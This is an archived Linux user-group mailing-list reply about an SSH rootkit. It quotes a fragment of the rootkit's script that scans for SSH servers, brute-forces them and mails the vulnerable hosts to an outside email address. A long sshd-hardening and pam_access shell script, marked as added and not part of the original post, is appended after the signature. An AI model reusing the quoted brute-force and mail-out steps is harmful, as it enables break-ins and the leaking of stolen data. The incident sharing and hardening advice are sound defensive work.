[clug] mc-root anyone?

Edward Lang edlang at edlang.org
Thu Jun 18 14:58:57 GMT 2009


Hi,

On Thu, Jun 18, 2009 at 2:34 PM, Michael Still<mikal at stillhq.com> wrote:
> Two questions:
>
>  - is there anything else I should do to this machine?

I vaguely touched on this topic a few months ago:

http://lists.samba.org/archive/linux/2009-April/022937.html

I still haven't found a satisfactory answer for my own personal
machines -- I don't have an army of operators and monitoring monkeys
at my private disposal...

>  - does anyone else know what this thing is? Bing searching doesn't turn
> much up.

The rootkit I had installed on my server contained this snippet:

[...]
echo -e "ssh bruteforce tool\n\r\t - by kaz\n\n"
./scan $1 22

sleep 10
cat $1.pscan.22 |sort |uniq > ip.conf
oopsnr2=`grep -c . ip.conf`
echo "# Am gasit $oopsnr2 servere."
echo "----------------------------------------"
mv ip.conf mfu.txt
./brute 100
rm -rf $1.pscan.22 ip.conf 1>/dev/null 2>/dev/null
cat vuln.txt | mail -s "noi" buzaionvasile at yahoo.com
echo "# Bahhh incearca alt ip ca asta e de-an polea."
[...]

Not sure if it's similar or useful for you in this instance. The
rootkit also included its own statically linked sshd containing this
string:

00a0400: 5353 4820 6272 7574 6566 6f72 6365 720a  SSH bruteforcer.
00a0410: 0d09 202d 2062 7920 6c69 7a61 7264 0a09  .. - by lizard..

... but you've already mentioned you're upgrading all your packages.

I like the recommendation of forcing the use of RSA / DSA keys for
SSH. Mimicking AIX's ``rlogin'' user attribute with PAM would be
handy, too, for those accounts that don't require the ability to
log in remotely.

Regards,

Edward.

-- 
Edward C. Lang

http://edlang.org/
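The two hardening measures mentioned in the post (key-only SSH authentication, and a PAM rule that denies remote login to accounts that never need it, in the spirit of AIX's rlogin attribute) as an added, runnable example. This is not code from the post or the list; the /etc paths are assumptions for a Linux host running OpenSSH with Linux-PAM, and the account names svc_backup and svc_www are constructed. The audit function reads an sshd_config the way sshd does (first occurrence before any Match block wins) and reports each weak or missing setting next to the value wanted.

```shell
#!/bin/sh
# Added example (not from the original post): key-only sshd settings, an audit
# that flags the weak ones, and a pam_access rule file for "no remote login" accounts.
# Paths are assumptions for a Linux host with OpenSSH + Linux-PAM; users are constructed.

# sshd_opt FILE KEY: effective global value of KEY (first occurrence before any
# Match block, as sshd evaluates it), lowercased; empty output if unset.
sshd_opt() {
    awk -v key="$2" '
        /^[ \t]*#/ || NF == 0 { next }
        tolower($1) == "match" { exit }
        tolower($1) == tolower(key) { print tolower($2); exit }
    ' "$1"
}

# audit_sshd_config FILE: print each weak setting; return 1 if any was found.
# Missing options are judged by the upstream default (PasswordAuthentication yes, etc.).
audit_sshd_config() {
    cfg="$1"; bad=0

    v=$(sshd_opt "$cfg" PasswordAuthentication)
    [ "${v:-yes}" = "no" ] || { echo "weak: PasswordAuthentication=${v:-yes} (want no)"; bad=1; }

    # Keyboard-interactive also accepts passwords through PAM; check the newer
    # option name first, then the older alias that 2009-era sshd understands.
    v=$(sshd_opt "$cfg" KbdInteractiveAuthentication)
    [ -n "$v" ] || v=$(sshd_opt "$cfg" ChallengeResponseAuthentication)
    [ "${v:-yes}" = "no" ] || { echo "weak: ChallengeResponseAuthentication=${v:-yes} (want no)"; bad=1; }

    v=$(sshd_opt "$cfg" PubkeyAuthentication)
    [ "${v:-yes}" = "yes" ] || { echo "weak: PubkeyAuthentication=$v (want yes)"; bad=1; }

    v=$(sshd_opt "$cfg" PermitEmptyPasswords)
    [ "${v:-no}" = "no" ] || { echo "weak: PermitEmptyPasswords=$v (want no)"; bad=1; }

    v=$(sshd_opt "$cfg" PermitRootLogin)
    case "$v" in
        no|prohibit-password|without-password) ;;
        *) echo "weak: PermitRootLogin=${v:-unset} (want no)"; bad=1 ;;
    esac

    # pam_access can only take effect if sshd consults PAM at all.
    v=$(sshd_opt "$cfg" UsePAM)
    [ "$v" = "yes" ] || { echo "weak: UsePAM=${v:-unset} (want yes so pam_access applies)"; bad=1; }

    return $bad
}

# write_sshd_hardening FILE: sshd settings that pass audit_sshd_config.
# Only option names accepted by both old and current OpenSSH releases are used.
write_sshd_hardening() {
    cat > "$1" <<'EOF'
# Key-based authentication only; no password or keyboard-interactive logins.
PubkeyAuthentication yes
PasswordAuthentication no
ChallengeResponseAuthentication no
PermitEmptyPasswords no
PermitRootLogin no
UsePAM yes
EOF
}

# write_pam_access_rules FILE USER...: pam_access rules denying the named accounts
# through whichever PAM service loads this file. Wire it into /etc/pam.d/sshd as
#   account required pam_access.so accessfile=FILE
# so console login via /etc/pam.d/login is untouched, like AIX's rlogin=false.
write_pam_access_rules() {
    out="$1"; shift
    {
        echo "# permission : users : origins"
        echo "- : $* : ALL"
        echo "+ : ALL : ALL"
    } > "$out"
}

# Demonstration on constructed files in a temporary directory.
demo() {
    d=$(mktemp -d)
    printf 'PasswordAuthentication yes\nPermitRootLogin yes\nUsePAM yes\n' > "$d/weak"
    write_sshd_hardening "$d/hardened"
    write_pam_access_rules "$d/access-sshd.conf" svc_backup svc_www
    echo "== weak config =="; audit_sshd_config "$d/weak" || true
    echo "== hardened config =="; audit_sshd_config "$d/hardened" && echo "ok"
    echo "== pam_access rules =="; cat "$d/access-sshd.conf"
    rm -rf "$d"
}

demo
```

Run the script as-is to see the weak file flagged and the hardened one pass; on a real host, point audit_sshd_config at /etc/ssh/sshd_config and restart sshd after changes, keeping one authenticated session open until a fresh key-based login has been confirmed. The pam_access file is loaded only by the service you add the accessfile= line to, so the same line can be added to other network-facing PAM services to extend the "no remote login" rule beyond sshd.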

